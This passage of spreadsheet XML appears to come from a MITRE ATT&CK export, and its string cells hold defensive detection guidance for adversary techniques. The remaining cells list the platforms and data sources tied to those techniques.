    <t>Monitor the execution of and command-line arguments for applications that may be used by an adversary to gain Initial Access that require user interaction. This includes compression applications, such as those for zip files, that can be used to [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) in payloads.
Anti-virus can potentially detect malicious documents and files that are downloaded and executed on the user's computer. Endpoint sensing or network sensing can potentially detect malicious events once the file is opened (such as a Microsoft Word document or PDF reaching out to the internet or spawning powershell.exe).</t>
  </si>
  <si>
    <t>Monitor the execution of and command-line arguments for applications that may be used by an adversary to gain initial access that require user interaction. This includes compression applications, such as those for zip files, that can be used to [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) in payloads.
Anti-virus can potentially detect malicious documents and files that are downloaded and executed on the user's computer. Endpoint sensing or network sensing can potentially detect malicious events once the file is opened (such as a Microsoft Word document or PDF reaching out to the internet or spawning powershell.exe).</t>
  </si>
  <si>
    <t>Monitor the local image registry to make sure malicious images are not added. Track the deployment of new containers, especially from newly built images. Monitor the behavior of containers within the environment to detect anomalous behavior or malicious activity after users deploy from malicious images.</t>
  </si>
  <si>
    <t>Inspect network traffic for indications that a user visited a malicious site, such as links included in phishing campaigns directed at your organization.
Anti-virus can potentially detect malicious documents and files that are downloaded from a link and executed on the user's computer.</t>
  </si>
  <si>
    <t>Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
Perform regular audits of domain and local system accounts to detect accounts that may have been created by an adversary for persistence. Checks on these accounts could also include whether default accounts such as Guest have been activated. These audits should also include checks on any appliances and applications for default credentials or SSH keys, and if any are discovered, they should be updated immediately.</t>
  </si>
  <si>
    <t>Monitor the activity of cloud accounts to detect abnormal or malicious behavior, such as accessing information outside of the normal function of the account or account usage at atypical hours.</t>
  </si>
  <si>
    <t>Monitor whether default accounts have been activated or logged into. These audits should also include checks on any appliances and applications for default credentials or SSH keys, and if any are discovered, they should be updated immediately.</t>
  </si>
  <si>
    <t>Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
On Linux, check logs and other artifacts created by use of domain authentication services, such as the System Security Services Daemon (sssd).(Citation: Ubuntu SSSD Docs) 
Perform regular audits of domain accounts to detect accounts that may have been created by an adversary for persistence.</t>
  </si>
  <si>
    <t>Perform regular audits of local system accounts to detect accounts that may have been created by an adversary for persistence. Look for suspicious account behavior, such as accounts logged in at odd times or outside of business hours.</t>
  </si>
  <si>
    <t>Detection of this technique may be difficult due to the various APIs that may be used. Telemetry data regarding API use may not be useful depending on how a system is normally used, but may provide context to other potentially malicious activity occurring on a system.
Behavior that could indicate technique use include an unknown or unusual process accessing APIs associated with devices or software that interact with the video camera, recording devices, or recording software, and a process periodically writing files to disk that contain video or camera image data.</t>
  </si>
  <si>
    <t>Virtualization, sandbox, user activity, and related discovery techniques will likely occur in the first steps of an operation but may also occur throughout as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as lateral movement, based on the information obtained. Detecting actions related to virtualization and sandbox identification may be difficult depending on the adversary's implementation and monitoring required. Monitoring for suspicious processes being spawned that gather a variety of system information or perform other forms of Discovery, especially in a short period of time, may aid in detection.</t>
  </si>
  <si>
    <t>Virtualization/sandbox related system checks will likely occur in the first steps of an operation but may also occur throughout as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as lateral movement, based on the information obtained. Detecting actions related to virtualization and sandbox identification may be difficult depending on the adversary's implementation and monitoring required. Monitoring for suspicious processes being spawned that gather a variety of system information or perform other forms of Discovery, especially in a short period of time, may aid in detection.</t>
  </si>
  <si>
    <t xml:space="preserve">Time-based evasion will likely occur in the first steps of an operation but may also occur throughout as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as lateral movement, based on the information obtained. Detecting actions related to virtualization and sandbox identification may be difficult depending on the adversary's implementation and monitoring required. Monitoring for suspicious processes being spawned that gather a variety of system information or perform other forms of Discovery, especially in a short period of time, may aid in detection. </t>
  </si>
  <si>
    <t xml:space="preserve">User activity-based checks will likely occur in the first steps of an operation but may also occur throughout as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as lateral movement, based on the information obtained. Detecting actions related to virtualization and sandbox identification may be difficult depending on the adversary's implementation and monitoring required. Monitoring for suspicious processes being spawned that gather a variety of system information or perform other forms of Discovery, especially in a short period of time, may aid in detection. </t>
  </si>
  <si>
    <t>There is no documented method for defenders to directly identify behaviors that weaken encryption. Detection efforts may be focused on closely related adversary behaviors, such as [Modify System Image](https://attack.mitre.org/techniques/T1601). Some detection methods require vendor support to aid in investigation.</t>
  </si>
  <si>
    <t>There is no documented method for defenders to directly identify behaviors that disable cryptographic hardware. Detection efforts may be focused on closely related adversary behaviors, such as [Modify System Image](https://attack.mitre.org/techniques/T1601) and [Network Device CLI](https://attack.mitre.org/techniques/T1059/008). Some detection methods require vendor support to aid in investigation.</t>
  </si>
  <si>
    <t>There is no documented method for defenders to directly identify behaviors that reduce encryption key space. Detection efforts may be focused on closely related adversary behaviors, such as [Modify System Image](https://attack.mitre.org/techniques/T1601) and [Network Device CLI](https://attack.mitre.org/techniques/T1059/008). Some detection methods require vendor support to aid in investigation.</t>
  </si>
  <si>
    <t>Host data that can relate unknown or suspicious process activity using a network connection is important to supplement any existing indicators of compromise based on malware command and control signatures and infrastructure or the presence of strong encryption. Packet capture analysis will require SSL/TLS inspection if data is encrypted. Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). User behavior monitoring may help to detect abnormal patterns of activity.(Citation: University of Birmingham C2)</t>
  </si>
  <si>
    <t>Host data that can relate unknown or suspicious process activity using a network connection is important to supplement any existing indicators of compromise based on malware command and control signatures and infrastructure or the presence of strong encryption. Packet capture analysis will require SSL/TLS inspection if data is encrypted. User behavior monitoring may help to detect abnormal patterns of activity.(Citation: University of Birmingham C2)</t>
  </si>
  <si>
    <t>Host data that can relate unknown or suspicious process activity using a network connection is important to supplement any existing indicators of compromise based on malware command and control signatures and infrastructure or the presence of strong encryption. Packet capture analysis will require SSL/TLS inspection if data is encrypted. Analyze network data for uncommon data flows. User behavior monitoring may help to detect abnormal patterns of activity.(Citation: University of Birmingham C2)</t>
  </si>
  <si>
    <t>Monitor network traffic for WMI connections; the use of WMI in environments that do not typically use WMI may be suspect. Perform process monitoring to capture command-line arguments of "wmic" and detect commands that are used to perform remote behavior. (Citation: FireEye WMI 2015)</t>
  </si>
  <si>
    <t>Use process monitoring to monitor the execution and arguments of msxsl.exe and wmic.exe. Compare recent invocations of these utilities with prior history of known good arguments and loaded files to determine anomalous and potentially adversarial activity (ex: URL command line arguments, creation of external network connections, loading of DLLs associated with scripting). (Citation: LOLBAS Wmic) (Citation: Twitter SquiblyTwo Detection APR 2018) Command arguments used before and after the script invocation may also be useful in determining the origin and purpose of the payload being loaded.
The presence of msxsl.exe or other utilities that enable proxy execution that are typically used for development, debugging, and reverse engineering on a system that is not used for these purposes may be suspicious.</t>
  </si>
  <si>
    <t>Linux, Windows, macOS</t>
  </si>
  <si>
    <t>Windows</t>
  </si>
  <si>
    <t>macOS</t>
  </si>
  <si>
    <t>Linux, macOS</t>
  </si>
  <si>
    <t>Linux, Office 365, SaaS, Windows, macOS</t>
  </si>
  <si>
    <t>Azure AD, Google Workspace, IaaS, Linux, Office 365, SaaS, Windows, macOS</t>
  </si>
  <si>
    <t>Azure AD, Google Workspace, IaaS, Office 365, SaaS</t>
  </si>
  <si>
    <t>Google Workspace, Office 365, Windows</t>
  </si>
  <si>
    <t>Azure AD, IaaS, SaaS</t>
  </si>
  <si>
    <t>Azure AD, SaaS, Windows</t>
  </si>
  <si>
    <t>IaaS, Linux, macOS</t>
  </si>
  <si>
    <t>PRE</t>
  </si>
  <si>
    <t>Linux, Network, Windows, macOS</t>
  </si>
  <si>
    <t>IaaS, Linux, SaaS, Windows, macOS</t>
  </si>
  <si>
    <t>Network</t>
  </si>
  <si>
    <t>Linux</t>
  </si>
  <si>
    <t>Azure AD, Containers, Google Workspace, IaaS, Linux, Network, Office 365, SaaS, Windows, macOS</t>
  </si>
  <si>
    <t>Azure AD, Containers, Google Workspace, IaaS, Linux, Office 365, SaaS, Windows, macOS</t>
  </si>
  <si>
    <t>Azure AD, Linux, Network, Office 365, Windows, macOS</t>
  </si>
  <si>
    <t>Containers</t>
  </si>
  <si>
    <t>IaaS</t>
  </si>
  <si>
    <t>Azure AD, Google Workspace, IaaS, Office 365</t>
  </si>
  <si>
    <t>Azure AD, Google Workspace, IaaS, Linux, Office 365, Windows, macOS</t>
  </si>
  <si>
    <t>IaaS, Linux, Windows, macOS</t>
  </si>
  <si>
    <t>IaaS, SaaS</t>
  </si>
  <si>
    <t>Google Workspace, IaaS, Linux, Office 365, SaaS, Windows, macOS</t>
  </si>
  <si>
    <t>SaaS</t>
  </si>
  <si>
    <t>Office 365, Windows</t>
  </si>
  <si>
    <t>Azure AD, Windows</t>
  </si>
  <si>
    <t>Linux, SaaS, Windows, macOS</t>
  </si>
  <si>
    <t>Google Workspace, Linux, Office 365, Windows, macOS</t>
  </si>
  <si>
    <t>Containers, Linux, Windows</t>
  </si>
  <si>
    <t>IaaS, Linux, Office 365, SaaS, Windows, macOS</t>
  </si>
  <si>
    <t>Containers, IaaS, Linux, Network, Windows, macOS</t>
  </si>
  <si>
    <t>Containers, Linux, Windows, macOS</t>
  </si>
  <si>
    <t>Azure AD, Google Workspace, IaaS, Office 365, SaaS, Windows</t>
  </si>
  <si>
    <t>Linux, Office 365, Windows, macOS</t>
  </si>
  <si>
    <t>Containers, IaaS, Linux, Network, Office 365, Windows, macOS</t>
  </si>
  <si>
    <t>Containers, IaaS, Linux, Windows, macOS</t>
  </si>
  <si>
    <t>Containers, IaaS</t>
  </si>
  <si>
    <t>Containers, Google Workspace, Linux, Network, Office 365, Windows, macOS</t>
  </si>
  <si>
    <t>Google Workspace, Linux, Office 365, SaaS, Windows, macOS</t>
  </si>
  <si>
    <t>Windows, macOS</t>
  </si>
  <si>
    <t>Azure AD, Google Workspace, IaaS, Linux, Network, Office 365, SaaS, Windows, macOS</t>
  </si>
  <si>
    <t>IaaS, Linux, Network, Windows, macOS</t>
  </si>
  <si>
    <t>Linux, Windows</t>
  </si>
  <si>
    <t>IaaS, Office 365, SaaS</t>
  </si>
  <si>
    <t>Azure AD, Containers, Google Workspace, Office 365, SaaS</t>
  </si>
  <si>
    <t>Azure AD, Linux, Windows, macOS</t>
  </si>
  <si>
    <t>Containers, Google Workspace, IaaS, Office 365, SaaS, Windows</t>
  </si>
  <si>
    <t>Azure AD, Containers, Google Workspace, IaaS, Office 365, SaaS</t>
  </si>
  <si>
    <t>Google Workspace, IaaS, Office 365, SaaS</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>Command: Command Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>Process: OS API Execution, Process: Process Creation</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Metadata, File: File Modification</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Modification, Process: Process Creation, Process: Process Metadata</t>
  </si>
  <si>
    <t>Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata</t>
  </si>
  <si>
    <t>Command: Command Execution, Process: OS API Execution</t>
  </si>
  <si>
    <t>Process: OS API Execution, Process: Process Creation, Process: Process Metadata</t>
  </si>
  <si>
    <t>Active Directory: Active Directory Object Modification, Process: OS API Execution, User Account: User Account Metadata</t>
  </si>
  <si>
    <t>Active Directory: Active Directory Object Modification, User Account: User Account Deletion, User Account: User Account Modification</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Access, Process: Process Creation</t>
  </si>
  <si>
    <t>Command: Command Execution</t>
  </si>
  <si>
    <t>Command: Command Execution, Group: Group Enumeration, Network Traffic: Network Traffic Content, Process: OS API Execution, Process: Process Creation</t>
  </si>
  <si>
    <t>Command: Command Execution, Process: Process Creation</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Access, Group: Group Enumeration, Process: OS API Execution, Process: Process Creation</t>
  </si>
  <si>
    <t>Active Directory: Active Directory Object Modification, Command: Command Execution, File: File Modification, Group: Group Modification, Process: Process Creation, User Account: User Account Modification</t>
  </si>
  <si>
    <t>Active Directory: Active Directory Object Modification, User Account: User Account Modification</t>
  </si>
  <si>
    <t>User Account: User Account Modification</t>
  </si>
  <si>
    <t>Application Log: Application Log Content, Group: Group Modification, User Account: User Account Modification</t>
  </si>
  <si>
    <t>Active Directory: Active Directory Object Creation, Application Log: Application Log Content, User Account: User Account Modification</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Modification, Process: Process Creation</t>
  </si>
  <si>
    <t>Domain Name: Active DNS, Domain Name: Domain Registration, Domain Name: Passive DNS, Internet Scan: Response Content, Internet Scan: Response Metadata</t>
  </si>
  <si>
    <t>Domain Name: Active DNS, Domain Name: Domain Registration, Domain Name: Passive DNS</t>
  </si>
  <si>
    <t>Internet Scan: Response Content, Internet Scan: Response Metadata</t>
  </si>
  <si>
    <t>Internet Scan: Response Content</t>
  </si>
  <si>
    <t>Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow</t>
  </si>
  <si>
    <t>Network Traffic: Network Traffic Flow</t>
  </si>
  <si>
    <t>Network Traffic: Network Traffic Content</t>
  </si>
  <si>
    <t>Application Log: Application Log Content, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Service: Service Creation, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>Application Log: Application Log Content, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow</t>
  </si>
  <si>
    <t>Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Service: Service Creation, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>Command: Command Execution, Process: OS API Execution, Process: Process Creation</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution</t>
  </si>
  <si>
    <t>File: File Creation, Script: Script Execution</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Creation, Process: Process Creation</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Access, Script: Script Execution</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Access, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Script: Script Execution</t>
  </si>
  <si>
    <t>Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Flow</t>
  </si>
  <si>
    <t>Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, Service: Service Metadata</t>
  </si>
  <si>
    <t>Command: Command Execution, Driver: Driver Load, File: File Creation, File: File Modification, Kernel: Kernel Module Load, Module: Module Load, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>Command: Command Execution, Module: Module Load, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Creation, File: File Modification, Kernel: Kernel Module Load, Process: Process Creation</t>
  </si>
  <si>
    <t>Driver: Driver Load, File: File Creation, File: File Modification, Module: Module Load</t>
  </si>
  <si>
    <t>File: File Creation, File: File Modification, Process: Process Creation</t>
  </si>
  <si>
    <t>File: File Creation, Module: Module Load, Process: OS API Execution, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>Driver: Driver Load, File: File Creation, Module: Module Load, Process: OS API Execution, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Modification</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>Command: Command Execution, Module: Module Load, Process: Process Creation, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Creation, File: File Modification, Process: Process Creation</t>
  </si>
  <si>
    <t>Active Directory: Active Directory Object Modification, Command: Command Execution, File: File Creation, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation</t>
  </si>
  <si>
    <t>Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation</t>
  </si>
  <si>
    <t>Active Directory: Active Directory Object Modification, Command: Command Execution, File: File Creation, File: File Modification, Process: Process Creation</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Process: Process Creation, Windows Registry: Windows Registry Key Creation</t>
  </si>
  <si>
    <t>Logon Session: Logon Session Creation, Process: Process Access, Process: Process Modification</t>
  </si>
  <si>
    <t>Application Log: Application Log Content, Command: Command Execution, User Account: User Account Authentication</t>
  </si>
  <si>
    <t>Application Log: Application Log Content, User Account: User Account Authentication</t>
  </si>
  <si>
    <t>Image: Image Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow</t>
  </si>
  <si>
    <t>Cloud Storage: Cloud Storage Enumeration, Instance: Instance Enumeration, Snapshot: Snapshot Enumeration, Volume: Volume Enumeration</t>
  </si>
  <si>
    <t>Logon Session: Logon Session Creation, User Account: User Account Authentication</t>
  </si>
  <si>
    <t>Cloud Service: Cloud Service Enumeration</t>
  </si>
  <si>
    <t>Cloud Storage: Cloud Storage Access, Cloud Storage: Cloud Storage Enumeration</t>
  </si>
  <si>
    <t>Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution</t>
  </si>
  <si>
    <t>Command: Command Execution, Module: Module Load, Process: Process Creation, Script: Script Execution</t>
  </si>
  <si>
    <t>Drive: Drive Access, Drive: Drive Creation</t>
  </si>
  <si>
    <t>Network Traffic: Network Traffic Content, Persona: Social Media</t>
  </si>
  <si>
    <t>File: File Creation, File: File Deletion, File: File Metadata, File: File Modification</t>
  </si>
  <si>
    <t>Domain Name: Active DNS, Domain Name: Passive DNS</t>
  </si>
  <si>
    <t>Container: Container Enumeration, Pod: Pod Enumeration</t>
  </si>
  <si>
    <t>Command: Command Execution, Process: Process Creation, User Account: User Account Creation</t>
  </si>
  <si>
    <t>User Account: User Account Creation</t>
  </si>
  <si>
    <t>Command: Command Execution, Driver: Driver Load, File: File Creation, File: File Modification, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Creation, File: File Modification, Service: Service Creation, Service: Service Modification</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Creation, File: File Modification, Process: Process Creation, Service: Service Creation, Service: Service Modification</t>
  </si>
  <si>
    <t>Command: Command Execution, Driver: Driver Load, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Access, Process: Process Creation</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Access</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation</t>
  </si>
  <si>
    <t>Command: Command Execution, Process: Process Access</t>
  </si>
  <si>
    <t>Cloud Storage: Cloud Storage Deletion, Command: Command Execution, File: File Deletion, File: File Modification, Image: Image Deletion, Instance: Instance Deletion, Process: Process Creation, Snapshot: Snapshot Deletion, Volume: Volume Deletion</t>
  </si>
  <si>
    <t>Cloud Storage: Cloud Storage Modification, Command: Command Execution, File: File Creation, File: File Modification, Network Share: Network Share Access, Process: Process Creation</t>
  </si>
  <si>
    <t>File: File Creation, File: File Deletion, File: File Metadata, File: File Modification, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution</t>
  </si>
  <si>
    <t>File: File Creation, File: File Deletion, File: File Metadata, File: File Modification, Process: OS API Execution</t>
  </si>
  <si>
    <t>File: File Creation, File: File Deletion, File: File Modification</t>
  </si>
  <si>
    <t>Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Access, File: File Creation, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Access, File: File Creation</t>
  </si>
  <si>
    <t>Cloud Storage: Cloud Storage Access</t>
  </si>
  <si>
    <t>Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content</t>
  </si>
  <si>
    <t>Application Log: Application Log Content, Logon Session: Logon Session Creation</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Access, Network Share: Network Share Access, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Access</t>
  </si>
  <si>
    <t>Application Log: Application Log Content, Command: Command Execution, Process: OS API Execution, Process: Process Creation</t>
  </si>
  <si>
    <t>Application Log: Application Log Content, File: File Creation, File: File Modification, Network Traffic: Network Traffic Content</t>
  </si>
  <si>
    <t>File: File Modification, Process: Process Creation, Script: Script Execution</t>
  </si>
  <si>
    <t>Application Log: Application Log Content, Container: Container Creation, Container: Container Start, Pod: Pod Creation, Pod: Pod Modification</t>
  </si>
  <si>
    <t>Internet Scan: Response Content, Malware Repository: Malware Content, Malware Repository: Malware Metadata</t>
  </si>
  <si>
    <t>Malware Repository: Malware Metadata</t>
  </si>
  <si>
    <t>Malware Repository: Malware Content, Malware Repository: Malware Metadata</t>
  </si>
  <si>
    <t>Command: Command Execution, Drive: Drive Access</t>
  </si>
  <si>
    <t>Command: Command Execution, Drive: Drive Access, Drive: Drive Modification, Driver: Driver Load, Process: Process Creation</t>
  </si>
  <si>
    <t>Active Directory: Active Directory Object Creation, Active Directory: Active Directory Object Deletion, Active Directory: Active Directory Object Modification, Command: Command Execution</t>
  </si>
  <si>
    <t>Active Directory: Active Directory Object Creation, Active Directory: Active Directory Object Modification, Command: Command Execution</t>
  </si>
  <si>
    <t>Command: Command Execution, Network Traffic: Network Traffic Content, Process: OS API Execution, Process: Process Creation, Script: Script Execution</t>
  </si>
  <si>
    <t>Application Log: Application Log Content, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Process: Process Creation</t>
  </si>
  <si>
    <t>Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow</t>
  </si>
  <si>
    <t>Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation</t>
  </si>
  <si>
    <t>Application Log: Application Log Content</t>
  </si>
  <si>
    <t>Command: Command Execution, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation</t>
  </si>
  <si>
    <t>Application Log: Application Log Content, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Sensor Health: Host Status</t>
  </si>
  <si>
    <t>Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Sensor Health: Host Status</t>
  </si>
  <si>
    <t>Container: Container Creation, Kernel: Kernel Module Load, Process: OS API Execution, Process: Process Creation, Volume: Volume Modification</t>
  </si>
  <si>
    <t>Cloud Service: Cloud Service Modification, Command: Command Execution, File: File Creation, File: File Metadata, File: File Modification, Module: Module Load, Process: Process Creation, WMI: WMI Creation, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Creation, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>Command: Command Execution, Module: Module Load, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Modification, Module: Module Load, Process: Process Creation, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Metadata, File: File Modification, Module: Module Load, Process: Process Creation</t>
  </si>
  <si>
    <t>Command: Command Execution, Process: Process Creation, WMI: WMI Creation</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Access, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow</t>
  </si>
  <si>
    <t>Command: Command Execution, Drive: Drive Creation, File: File Access, Process: Process Creation</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow</t>
  </si>
  <si>
    <t>Application Log: Application Log Content, Network Traffic: Network Traffic Content</t>
  </si>
  <si>
    <t>Application Log: Application Log Content, Process: Process Creation</t>
  </si>
  <si>
    <t>Application Log: Application Log Content, Process: Process Creation, User Account: User Account Authentication</t>
  </si>
  <si>
    <t>Driver: Driver Load, Process: Process Creation</t>
  </si>
  <si>
    <t>Application Log: Application Log Content, Logon Session: Logon Session Metadata, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow</t>
  </si>
  <si>
    <t>Active Directory: Active Directory Object Modification, Command: Command Execution, File: File Metadata, Process: Process Creation</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Metadata, Process: Process Creation</t>
  </si>
  <si>
    <t>Firmware: Firmware Modification</t>
  </si>
  <si>
    <t>File: File Access, File: File Creation, File: File Modification, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow</t>
  </si>
  <si>
    <t>Logon Session: Logon Session Creation, Web Credential: Web Credential Creation, Web Credential: Web Credential Usage</t>
  </si>
  <si>
    <t>Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication, Web Credential: Web Credential Creation, Web Credential: Web Credential Usage</t>
  </si>
  <si>
    <t>Logon Session: Logon Session Creation, Web Credential: Web Credential Usage</t>
  </si>
  <si>
    <t>Active Directory: Active Directory Object Access, Command: Command Execution, Network Traffic: Network Traffic Content, Process: Process Creation, Script: Script Execution</t>
  </si>
  <si>
    <t>Application Log: Application Log Content, Drive: Drive Creation, Network Traffic: Network Traffic Flow</t>
  </si>
  <si>
    <t>Application Log: Application Log Content, Command: Command Execution, File: File Creation, File: File Metadata, File: File Modification, Firmware: Firmware Modification, Process: OS API Execution, Process: Process Creation, Script: Script Execution, Service: Service Creation, User Account: User Account Creation, User Account: User Account Metadata, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>Application Log: Application Log Content, Command: Command Execution, File: File Modification</t>
  </si>
  <si>
    <t>File: File Modification, Firmware: Firmware Modification, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Creation, File: File Metadata, Process: Process Creation</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Modification, Process: Process Creation, User Account: User Account Creation, User Account: User Account Metadata, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Modification, Process: Process Creation, Script: Script Execution</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution</t>
  </si>
  <si>
    <t>Process: Process Creation</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Creation, Image: Image Metadata, Process: Process Creation, Service: Service Creation, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>File: File Metadata, Script: Script Execution</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation, Service: Service Metadata, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>File: File Creation, File: File Modification, Module: Module Load</t>
  </si>
  <si>
    <t>File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation</t>
  </si>
  <si>
    <t>File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation, Service: Service Metadata</t>
  </si>
  <si>
    <t>Process: OS API Execution</t>
  </si>
  <si>
    <t>File: File Creation, Process: Process Creation, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>File: File Creation, File: File Modification, Process: Process Creation, Service: Service Metadata</t>
  </si>
  <si>
    <t>Command: Command Execution, Process: Process Creation, Service: Service Modification, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
